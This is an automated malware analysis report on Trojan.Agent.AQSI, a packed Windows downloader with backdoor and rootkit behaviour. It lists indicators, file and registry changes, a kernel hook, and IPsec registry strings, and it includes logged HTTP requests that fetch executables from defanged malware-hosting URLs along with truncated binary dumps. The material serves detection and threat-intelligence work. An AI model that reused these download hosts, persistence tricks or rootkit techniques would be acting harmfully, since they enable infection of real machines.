Trojan.Agent.AQSI_0e035b78e9

by malwarelabrobot on October 23rd, 2014 in Malware Descriptions.

Trojan-Downloader.Win32.Geral.ssc (Kaspersky), Trojan.Agent.AQSI (B) (Emsisoft), Trojan.Agent.AQSI (AdAware), Backdoor.Win32.Farfli.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan, Backdoor


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 0e035b78e94e2e4f1ff3db390148d1cc
SHA1: 00037ae1265de8536a1bbcf680475663aa648b81
SHA256: 8edcc5c35a38e58bf46384bac2e65e32cb11fc2bb047ac4d50ce630ba9d420ae
SSDeep: 768:17ugUsUymtvYGYXQQYKeYkNM rZOgk2pfArfiS3 :1CQULBYG4QQY9YYM EZAE/
Size: 37473 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: WinUpackv030beta, Upackv032BetaPatch, PolyEnE001byLennartHedlund, UPolyXv05_v6
Company: no certificate found
Created at: 1970-01-01 03:00:00
Analyzed on: WindowsXPESX SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

sc.exe:612
sc.exe:1572
sc.exe:1776
OneG2190828.exe:1548
runonce.exe:340

The Trojan injects its code into the following process(es):

%original file name%.exe:1696
cc2178718.exe:744

Mutexes

The following mutexes were created/opened:

ZonesLockedCacheCounterMutex
ZonesCacheCounterMutex
ZonesCounterMutex
ShimCacheMutex
LDMMOO.

File activity

The process %original file name%.exe:1696 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\cc2178718.exe (16 bytes)
%System%\wbem\Logs (4 bytes)
%WinDir%\inf\oem10.inf (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp (8 bytes)
%Documents and Settings%\%current user%\Local Settings (8 bytes)
%WinDir%\5717.mp4 (58 bytes)
%WinDir%\Temp\Perflib_Perfdata_7a8.dat (4 bytes)
%Documents and Settings%\All Users (4 bytes)
%WinDir% (192 bytes)
C:\$Directory (12 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5 (4 bytes)
%System%\jsseting.data (16 bytes)
%System% (1920 bytes)
%System%\config\SysEvent.Evt (168 bytes)
%Program Files%\RAV\CCtest.inf (4 bytes)
C:\PROGRAM FILES (96 bytes)
%Program Files%\RAV\CCtest.sys (7 bytes)
%System%\drivers\pcidump.sys (11 bytes)
%System%\config (96 bytes)
%WinDir%\inf\oem10.PNF (18746 bytes)
%System%\drivers (96 bytes)
%Documents and Settings%\%current user% (4 bytes)
%Program Files%\RAV\CCtest.dll (10 bytes)
%WinDir%\setupapi.log (32472 bytes)
%System%\drivers\SET41.tmp (7 bytes)
%Documents and Settings%\%current user%\Cookies (96 bytes)

The Trojan deletes the following file(s):

%WinDir%\5717.mp4 (0 bytes)
%Program Files%\RAV\CCtest.inf (0 bytes)
%Program Files%\RAV\CCtest.dll (0 bytes)
%System%\drivers\SET41.tmp (0 bytes)
%Program Files%\RAV\CCtest.sys (0 bytes)
%System%\drivers\pcidump.sys (0 bytes)
%System%\jsseting.data (0 bytes)

The process OneG2190828.exe:1548 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\Rwmltcy.cc3 (75 bytes)

The process cc2178718.exe:744 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\ope42.tmp (100 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\OneG2180875.exe (5572 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\OneG2190828.exe (11028 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\ope42.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\OneG2180875.exe (0 bytes)

Registry activity

The process sc.exe:612 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6D B4 1A 1A 7A 81 93 86 56 61 73 80 FD 3F 70 C0"

The process sc.exe:1572 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5C 43 C2 7B 8E AF 29 D3 B4 4E 69 B7 F8 AE 40 13"

The process sc.exe:1776 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6A 42 FB 27 21 A0 A2 40 76 B2 96 35 E3 11 92 00"

The process %original file name%.exe:1696 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Control\Class\{D4A133FE-C9E5-4F11-A812-FED74DA86ED5}\0000]
"MatchingDeviceId" = "*cctestdevice"
"InfSection" = "CCTest_DDI"

[HKLM\System\CurrentControlSet\Control\Class\{D4A133FE-C9E5-4F11-A812-FED74DA86ED5}]
"Icon" = "-18"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\System\CurrentControlSet\Control\Class\{D4A133FE-C9E5-4F11-A812-FED74DA86ED5}\0000]
"InfPath" = "oem10.inf"
"ProviderName" = "Microsoft"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SYSTEM\LastKnownGoodRecovery\LastGood]
"INF/oem10.inf" = "1"

[HKLM\System\CurrentControlSet\Control\Class\{D4A133FE-C9E5-4F11-A812-FED74DA86ED5}]
"Class" = "CCTest"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Control\Class\{D4A133FE-C9E5-4F11-A812-FED74DA86ED5}]
"(Default)" = "Class for CCTest devices"

[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"Extended Base" = "05 00 00 00 01 00 00 00 02 00 00 00 04 00 00 00"

[HKLM\System\CurrentControlSet\Control\Class\{D4A133FE-C9E5-4F11-A812-FED74DA86ED5}\0000]
"InfSectionExt" = ".NT"
"DriverVersion" = "1.0.0.0"

"DriverDate" = "5-7-2010"

[HKLM\SYSTEM\LastKnownGoodRecovery\LastGood]
"INF/oem10.PNF" = "1"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "43 AE 9A 60 EF 5E 99 54 75 F5 A9 19 8E C2 4F B3"

[HKLM\System\CurrentControlSet\Control\Class\{D4A133FE-C9E5-4F11-A812-FED74DA86ED5}\0000]
"DriverDateData" = "00 80 7A 3C 78 ED CA 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"reg.exe" = "Registry Console Tool"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"sc.exe" = "A tool to aid in developing services for WindowsNT"

[HKLM\System\CurrentControlSet\Control\Class\{D4A133FE-C9E5-4F11-A812-FED74DA86ED5}\0000]
"DriverDesc" = "CCTest Device"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The process runonce.exe:340 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B1 BD EA 62 6F C9 3F 6C E9 C7 79 83 FE 20 A1 60"

Dropped PE files

MD5 File path
2c2b4c8ad5022846aa424076a31c961c c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\cc2178718.exe
23de22dc74b2878b72fc1e71f6026d5f c:\WINDOWS\system32\Rwmltcy.cc3
62a291ddfc8d86b4164d195211cf90d9 c:\WINDOWS\system32\drivers\CCTest.sys
add4832059173fcdb135d949194ad52b c:\WINDOWS\system32\jsseting.data

HOSTS file anomalies

No changes have been detected.

Rootkit activity

The Trojan installs the following kernel-mode hooks:

ZwQuerySystemInformation

Using the driver "%System%\drivers\pcidump.sys" the Trojan substitutes IRP handlers in a file system driver (NTFS) to control operations with files:

MJ_CREATE

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.Upack 4096 139264 512 1.96068 f92dea8a39a051133c79752ab6289945
.rsrc 143360 69632 36961 5.5417 406e6de271cf332038f71d0543efba3a

Dropped from:

Downloaded by:

0e035b78e94e2e4f1ff3db390148d1cc

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://s-56350.gotocdn.com/templates/6000.exe
hxxp://s-56350.gotocdn.com/templates/sc.exe
hxxp://www.gaopinhanhsteel.com/templates/sc.exe 113.10.149.127
hxxp://www.gaopinhanhsteel.com/templates/6000.exe 113.10.149.127
mateng1761.f3322.org 42.51.155.159


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY HTTP Request on Unusual Port Possibly Hostile

Traffic

GET /templates/6000.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.gaopinhanhsteel.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Wed, 22 Oct 2014 18:29:30 GMT
Content-Length: 37473
Content-Type: application/octet-stream
Content-Location: hXXp://VVV.gaopinhanhsteel.com/templates/6000.exe
Last-Modified: Wed, 17 Sep 2014 15:03:36 GMT
Accept-Ranges: bytes
ETag: "996a9f8e88d2cf1:21f50"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
MZKERNEL32.DLL..LoadLibraryA....GetProcAddress.......ByDwing@...PE..L.
.....................2............0.............@.....................
[email protected]...(.............
......................................................................
.................................Upack... ..........................`.
...rsrc........0..a...................`...d.B......0B.................
[email protected].|[email protected].."B.....5.
B...B.K.B..............o..O...7j...jG.....m..'nA....77.X.Yj.V......h:.
.WW.r..(..%..!z1.b...t&...B>.UhB[....b.5.Y[....dC....-.......O..$..
..{.f....9.s.@..........)".g@9.,T..[.j;|...m..^....1...n?.*..f....e.u$
$..h.?..'.Bu..|.*.U.P....~...w.Fr..{!c....3,....O2w..,q...S.s...d. '.V
..n.............]"\..F^.h.Z..!.......y..S...`Di..)...j,.K.M.\/b_...R..
.k.....A..-."^......B'..c-/$...?x.{..p.O.r.7...8..C...`L...S....`CW...
............)V0J...e/..H.Eh...}.....v.4.......H...1....B....l._.....$.
AT.....#g.t.G..l..{.F}...J(.V^...#.PWk....?.=SX5.Z.g...e.I.....q..I...
..k.@'....KCa..K.-=..e..[}.VN..m.0d..7...}.H...p..r...{2{.-"x!.U,...&g
t;...Y/.d...9K...}[email protected](....W...xP...J..>}...m.....<..{.
.%.j."A........T....NN.^...%PI.....|9r.qm..\i..*[email protected]. ..S8SvZ\
......[H7hz...ljI/.....'../'[.U.'Gs...k............).v..y./...E..._..~
..>v..hj...q:......'.Z.O=.`1.=......n.q....M.D.oQ.......j.z.....A.{
.XG..x..<>x:....s..C..~.*. [email protected] ...0.m)..PM..
..[j^....$..^B. [email protected]%...y.y......
<<< skipped >>>

GET /templates/sc.exe HTTP/1.1


User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.gaopinhanhsteel.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Wed, 22 Oct 2014 18:29:34 GMT
Content-Length: 78848
Content-Type: application/octet-stream
Content-Location: hXXp://VVV.gaopinhanhsteel.com/templates/sc.exe
Last-Modified: Wed, 17 Sep 2014 15:03:10 GMT
Accept-Ranges: bytes
ETag: "535efc7e88d2cf1:21f50"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
MZ......................@............................................i
.L.i.L.i.L.O.L.i.L.i.L.i.L.f.L.i.L7v.L.i.L.o.L.i.LRich.i.L............
....PE..L.....yN.....................*............... ....@...........
...............p..............................................l ..<
....`.................................................................
.............. ..l............................text...z................
........... ..`.rdata....... ......................@[email protected] ...0.
.."[email protected]........`.......0..............@..@.....
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................V.t$.W.|$.;.u..._^.... 
@.P.3.......5...... ..F......_^..............L$..T$..D$..L$..L$.R.T$.Q
PR.D$.... @.....D$.u.... @...t............D$..T$.....................(
...U3.VUj..........tnS.D$.WPV.D$.(....y.....tA..$<...... @..L$4QW..
..t#.T$.RV.K.....u.V... @._[..^]..(.........V... @._[..^]..(......^]..
(.....................`....D$TSUVWh....3.PV..L @.....0....L$dh.....T$h
QR..H @...........$h...h....Ph.PA...D @..........L$dh.PA.Q..$t...h.PA.
R..d @......$l.....$h...PQ..@ @...< @.3..T$......3..|$$.T$.h...
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_1696:

MZKERNEL32.DLL
.Upack
.rsrc
.data
.reloc
Acr@ojcTcrtocpgjViohrctu&`gojcb'
\drivers\gm.dls
\drivers\pcidump.sys
GetWindowsDirectoryA
KERNEL32.dll
ADVAPI32.dll
khy.dll
; File Name: CCTest.inf
; Generated by C DriverWizard 3.2.0 (Build 2485)
Signature="$WINDOWS NT$"
ClassGUID={D4A133FE-C9E5-4F11-A812-FED74DA86ED5}
DriverVer=5/7/2010,1.00.0000
CatalogFile=CCTest.cat
;reg-root,[subkey],[value-entry-name],[flags],[value]
HKR,,,%REG_SZ%,ÞviceClassName%
1 = %DiskId1%,,,""
CCTest.sys = 1,,
ÌTest_DeviceDesc$=CCTest_DDI, *CCTestDevice
; --------- Windows 98 -----------------
; cause problems in Windows 98
HKR,,NTMPDriver,,CCTest.sys
HKR,,Description,,ÌTest_DeviceDesc%
; --------- Windows NT -----------------
[CCTest_DDI.NT]
[CCTest_DDI.NT.Services]
Addservice = CCTest, %FLG_ADDREG_NOCLOBBER%, CCTest_Service
DisplayName = ÌTest_SvcDesc%
ServiceType = %SERVICE_KERNEL_DRIVER%
StartType = %SERVICE_DEMAND_START%
ErrorControl = %SERVICE_ERROR_NORMAL%
ServiceBinary = %\CCTest.sys
CCTest.sys,,,2
FLG_ADDREG_KEYONLY = 0x00000010
FLG_ADDREG_64BITKEY = 0x00001000
FLG_ADDREG_KEYONLY_COMMON = 0x00002000
FLG_ADDREG_32BITKEY = 0x00004000
.text
h.data
B.reloc
D:\5-20\9\CCTest\Driver\objfre\i386\CCTest.pdb
ZwCreateKey
ntoskrnl.exe
HAL.dll
`.CRT
.tls0
.reloc
hXXp://host
hXXp://count
2014-8-1
000000000000
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
iphlpapi.dll
Windows7
Windows2000
WindowsXP
Windows2003
Windows98
WindowsNT
hXXp://downpath
%sOneG%d.exe
SSSSh
YYSSSSh
WinExec
USER32.dll
RegCloseKey
RegCreateKeyA
InternetOpenUrlA
HttpQueryInfoA
DeleteUrlCacheEntry
WININET.dll
MSVCP60.dll
ShellExecuteA
SHELL32.dll
MSVCRT.dll
advapi32.dll
kdll.dll
setupapi.dll
shell32.dll
reg.exe
import
\5717.mp4
jsseting.data
%scc%d.exe
KERNEL32.DLL
GetCPInfo
USER32.DLL
SETUPAPI.DLL
w.Nps
B).pA)
7Vn%c:
83.XW
u%u#@
JNh.VV{
U%UR]
Windows NT\
Image File Execution Options\
svchost.exe
CCTest.sys
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local]
"ActivePolicy"="SOFTWARE\\Policies\\Microsoft\\Windows\\IPSec\\Policy\\Local\\ipsecPolicy{587716d4-83f7-4a02-97c2-6137d945e86a}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecFilter{72385235-70fa-11d1-864c-14a300000000}]
"name"="ipsecFilter{72385235-70fa-11d1-864c-14a300000000}"
"ipsecID"="{72385235-70fa-11d1-864c-14a300000000}"
00,00,00,00,00,00,00
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecFilter{7238523a-70fa-11d1-864c-14a300000000}]
"name"="ipsecFilter{7238523a-70fa-11d1-864c-14a300000000}"
"ipsecID"="{7238523a-70fa-11d1-864c-14a300000000}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNegotiationPolicy{7238523f-70fa-11d1-864c-14a300000000}]
"name"="ipsecNegotiationPolicy{7238523f-70fa-11d1-864c-14a300000000}"
"ipsecID"="{7238523f-70fa-11d1-864c-14a300000000}"
"ipsecNegotiationPolicyAction"="{3f91a81a-7647-11d1-864d-d46a00000000}"
"ipsecNegotiationPolicyType"="{62f49e10-6c37-11d1-864c-14a300000000}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecFilter{f2fd0bda-3962-428d-9d06-34c2b19568bb}]
"name"="ipsecFilter{f2fd0bda-3962-428d-9d06-34c2b19568bb}"
"ipsecID"="{f2fd0bda-3962-428d-9d06-34c2b19568bb}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecISAKMPPolicy{72385234-70fa-11d1-864c-14a300000000}]
"name"="ipsecISAKMPPolicy{72385234-70fa-11d1-864c-14a300000000}"
"ipsecID"="{72385234-70fa-11d1-864c-14a300000000}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecISAKMPPolicy{c37d0b66-13e0-4bf0-a103-e09908ece1b7}]
"name"="ipsecISAKMPPolicy{c37d0b66-13e0-4bf0-a103-e09908ece1b7}"
"ipsecID"="{c37d0b66-13e0-4bf0-a103-e09908ece1b7}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNegotiationPolicy{56093cf4-1dd4-4ed9-b0f8-e9f83f4ae82f}]
"name"="ipsecNegotiationPolicy{56093cf4-1dd4-4ed9-b0f8-e9f83f4ae82f}"
"ipsecID"="{56093cf4-1dd4-4ed9-b0f8-e9f83f4ae82f}"
"ipsecNegotiationPolicyAction"="{3f91a819-7647-11d1-864d-d46a00000000}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNegotiationPolicy{72385233-70fa-11d1-864c-14a300000000}]
"name"="ipsecNegotiationPolicy{72385233-70fa-11d1-864c-14a300000000}"
"ipsecID"="{72385233-70fa-11d1-864c-14a300000000}"
00,00,00,00
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNegotiationPolicy{7238523b-70fa-11d1-864c-14a300000000}]
"name"="ipsecNegotiationPolicy{7238523b-70fa-11d1-864c-14a300000000}"
"ipsecID"="{7238523b-70fa-11d1-864c-14a300000000}"
"ipsecNegotiationPolicyAction"="{8a171dd2-77e3-11d1-8659-a04f00000000}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNegotiationPolicy{a664b054-eebd-4697-aee0-a38f35bc4eb8}]
"name"="ipsecNegotiationPolicy{a664b054-eebd-4697-aee0-a38f35bc4eb8}"
"ipsecID"="{a664b054-eebd-4697-aee0-a38f35bc4eb8}"
"ipsecNegotiationPolicyAction"="{8a171dd3-77e3-11d1-8659-a04f00000000}"
"ipsecNegotiationPolicyType"="{62f49e13-6c37-11d1-864c-14a300000000}"
00,00,00,00,00,00,00,00,00
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNFA{77d93b21-350c-4649-b8fd-3b5428af7b8d}]
"name"="ipsecNFA{77d93b21-350c-4649-b8fd-3b5428af7b8d}"
"ipsecID"="{77d93b21-350c-4649-b8fd-3b5428af7b8d}"
"ipsecNegotiationPolicyReference"="SOFTWARE\\Policies\\Microsoft\\Windows\\IPSec\\Policy\\Local\\ipsecNegotiationPolicy{56093cf4-1dd4-4ed9-b0f8-e9f83f4ae82f}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNFA{f6050147-987a-4592-8d14-e8aee7e77bd4}]
"name"="ipsecNFA{f6050147-987a-4592-8d14-e8aee7e77bd4}"
"ipsecID"="{f6050147-987a-4592-8d14-e8aee7e77bd4}"
"ipsecNegotiationPolicyReference"="SOFTWARE\\Policies\\Microsoft\\Windows\\IPSec\\Policy\\Local\\ipsecNegotiationPolicy{a664b054-eebd-4697-aee0-a38f35bc4eb8}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecPolicy{587716d4-83f7-4a02-97c2-6137d945e86a}]
"name"="ipsecPolicy{587716d4-83f7-4a02-97c2-6137d945e86a}"
"ipsecID"="{587716d4-83f7-4a02-97c2-6137d945e86a}"
"ipsecISAKMPReference"="SOFTWARE\\Policies\\Microsoft\\Windows\\IPSec\\Policy\\Local\\ipsecISAKMPPolicy{c37d0b66-13e0-4bf0-a103-e09908ece1b7}"

%original file name%.exe_1696_rwx_00401000_00022000:

.data
.reloc
Acr@ojcTcrtocpgjViohrctu&`gojcb'
\drivers\gm.dls
\drivers\pcidump.sys
GetWindowsDirectoryA
KERNEL32.dll
ADVAPI32.dll
khy.dll
; File Name: CCTest.inf
; Generated by C DriverWizard 3.2.0 (Build 2485)
Signature="$WINDOWS NT$"
ClassGUID={D4A133FE-C9E5-4F11-A812-FED74DA86ED5}
DriverVer=5/7/2010,1.00.0000
CatalogFile=CCTest.cat
;reg-root,[subkey],[value-entry-name],[flags],[value]
HKR,,,%REG_SZ%,ÞviceClassName%
1 = %DiskId1%,,,""
CCTest.sys = 1,,
ÌTest_DeviceDesc$=CCTest_DDI, *CCTestDevice
; --------- Windows 98 -----------------
; cause problems in Windows 98
HKR,,NTMPDriver,,CCTest.sys
HKR,,Description,,ÌTest_DeviceDesc%
; --------- Windows NT -----------------
[CCTest_DDI.NT]
[CCTest_DDI.NT.Services]
Addservice = CCTest, %FLG_ADDREG_NOCLOBBER%, CCTest_Service
DisplayName = ÌTest_SvcDesc%
ServiceType = %SERVICE_KERNEL_DRIVER%
StartType = %SERVICE_DEMAND_START%
ErrorControl = %SERVICE_ERROR_NORMAL%
ServiceBinary = %\CCTest.sys
CCTest.sys,,,2
FLG_ADDREG_KEYONLY = 0x00000010
FLG_ADDREG_64BITKEY = 0x00001000
FLG_ADDREG_KEYONLY_COMMON = 0x00002000
FLG_ADDREG_32BITKEY = 0x00004000
.text
h.data
.rsrc
B.reloc
D:\5-20\9\CCTest\Driver\objfre\i386\CCTest.pdb
ZwCreateKey
ntoskrnl.exe
HAL.dll
`.CRT
.tls0
.reloc
hXXp://host
hXXp://count
2014-8-1
000000000000
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
iphlpapi.dll
Windows7
Windows2000
WindowsXP
Windows2003
Windows98
WindowsNT
hXXp://downpath
%sOneG%d.exe
SSSSh
YYSSSSh
WinExec
USER32.dll
RegCloseKey
RegCreateKeyA
InternetOpenUrlA
HttpQueryInfoA
DeleteUrlCacheEntry
WININET.dll
MSVCP60.dll
ShellExecuteA
SHELL32.dll
MSVCRT.dll
advapi32.dll
kdll.dll
setupapi.dll
shell32.dll
reg.exe
import
\5717.mp4
jsseting.data
%scc%d.exe
KERNEL32.DLL
GetCPInfo
USER32.DLL
SETUPAPI.DLL
Windows NT\
Image File Execution Options\
svchost.exe
CCTest.sys
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local]
"ActivePolicy"="SOFTWARE\\Policies\\Microsoft\\Windows\\IPSec\\Policy\\Local\\ipsecPolicy{587716d4-83f7-4a02-97c2-6137d945e86a}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecFilter{72385235-70fa-11d1-864c-14a300000000}]
"name"="ipsecFilter{72385235-70fa-11d1-864c-14a300000000}"
"ipsecID"="{72385235-70fa-11d1-864c-14a300000000}"
00,00,00,00,00,00,00
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecFilter{7238523a-70fa-11d1-864c-14a300000000}]
"name"="ipsecFilter{7238523a-70fa-11d1-864c-14a300000000}"
"ipsecID"="{7238523a-70fa-11d1-864c-14a300000000}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNegotiationPolicy{7238523f-70fa-11d1-864c-14a300000000}]
"name"="ipsecNegotiationPolicy{7238523f-70fa-11d1-864c-14a300000000}"
"ipsecID"="{7238523f-70fa-11d1-864c-14a300000000}"
"ipsecNegotiationPolicyAction"="{3f91a81a-7647-11d1-864d-d46a00000000}"
"ipsecNegotiationPolicyType"="{62f49e10-6c37-11d1-864c-14a300000000}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecFilter{f2fd0bda-3962-428d-9d06-34c2b19568bb}]
"name"="ipsecFilter{f2fd0bda-3962-428d-9d06-34c2b19568bb}"
"ipsecID"="{f2fd0bda-3962-428d-9d06-34c2b19568bb}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecISAKMPPolicy{72385234-70fa-11d1-864c-14a300000000}]
"name"="ipsecISAKMPPolicy{72385234-70fa-11d1-864c-14a300000000}"
"ipsecID"="{72385234-70fa-11d1-864c-14a300000000}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecISAKMPPolicy{c37d0b66-13e0-4bf0-a103-e09908ece1b7}]
"name"="ipsecISAKMPPolicy{c37d0b66-13e0-4bf0-a103-e09908ece1b7}"
"ipsecID"="{c37d0b66-13e0-4bf0-a103-e09908ece1b7}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNegotiationPolicy{56093cf4-1dd4-4ed9-b0f8-e9f83f4ae82f}]
"name"="ipsecNegotiationPolicy{56093cf4-1dd4-4ed9-b0f8-e9f83f4ae82f}"
"ipsecID"="{56093cf4-1dd4-4ed9-b0f8-e9f83f4ae82f}"
"ipsecNegotiationPolicyAction"="{3f91a819-7647-11d1-864d-d46a00000000}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNegotiationPolicy{72385233-70fa-11d1-864c-14a300000000}]
"name"="ipsecNegotiationPolicy{72385233-70fa-11d1-864c-14a300000000}"
"ipsecID"="{72385233-70fa-11d1-864c-14a300000000}"
00,00,00,00
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNegotiationPolicy{7238523b-70fa-11d1-864c-14a300000000}]
"name"="ipsecNegotiationPolicy{7238523b-70fa-11d1-864c-14a300000000}"
"ipsecID"="{7238523b-70fa-11d1-864c-14a300000000}"
"ipsecNegotiationPolicyAction"="{8a171dd2-77e3-11d1-8659-a04f00000000}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNegotiationPolicy{a664b054-eebd-4697-aee0-a38f35bc4eb8}]
"name"="ipsecNegotiationPolicy{a664b054-eebd-4697-aee0-a38f35bc4eb8}"
"ipsecID"="{a664b054-eebd-4697-aee0-a38f35bc4eb8}"
"ipsecNegotiationPolicyAction"="{8a171dd3-77e3-11d1-8659-a04f00000000}"
"ipsecNegotiationPolicyType"="{62f49e13-6c37-11d1-864c-14a300000000}"
00,00,00,00,00,00,00,00,00
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNFA{77d93b21-350c-4649-b8fd-3b5428af7b8d}]
"name"="ipsecNFA{77d93b21-350c-4649-b8fd-3b5428af7b8d}"
"ipsecID"="{77d93b21-350c-4649-b8fd-3b5428af7b8d}"
"ipsecNegotiationPolicyReference"="SOFTWARE\\Policies\\Microsoft\\Windows\\IPSec\\Policy\\Local\\ipsecNegotiationPolicy{56093cf4-1dd4-4ed9-b0f8-e9f83f4ae82f}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNFA{f6050147-987a-4592-8d14-e8aee7e77bd4}]
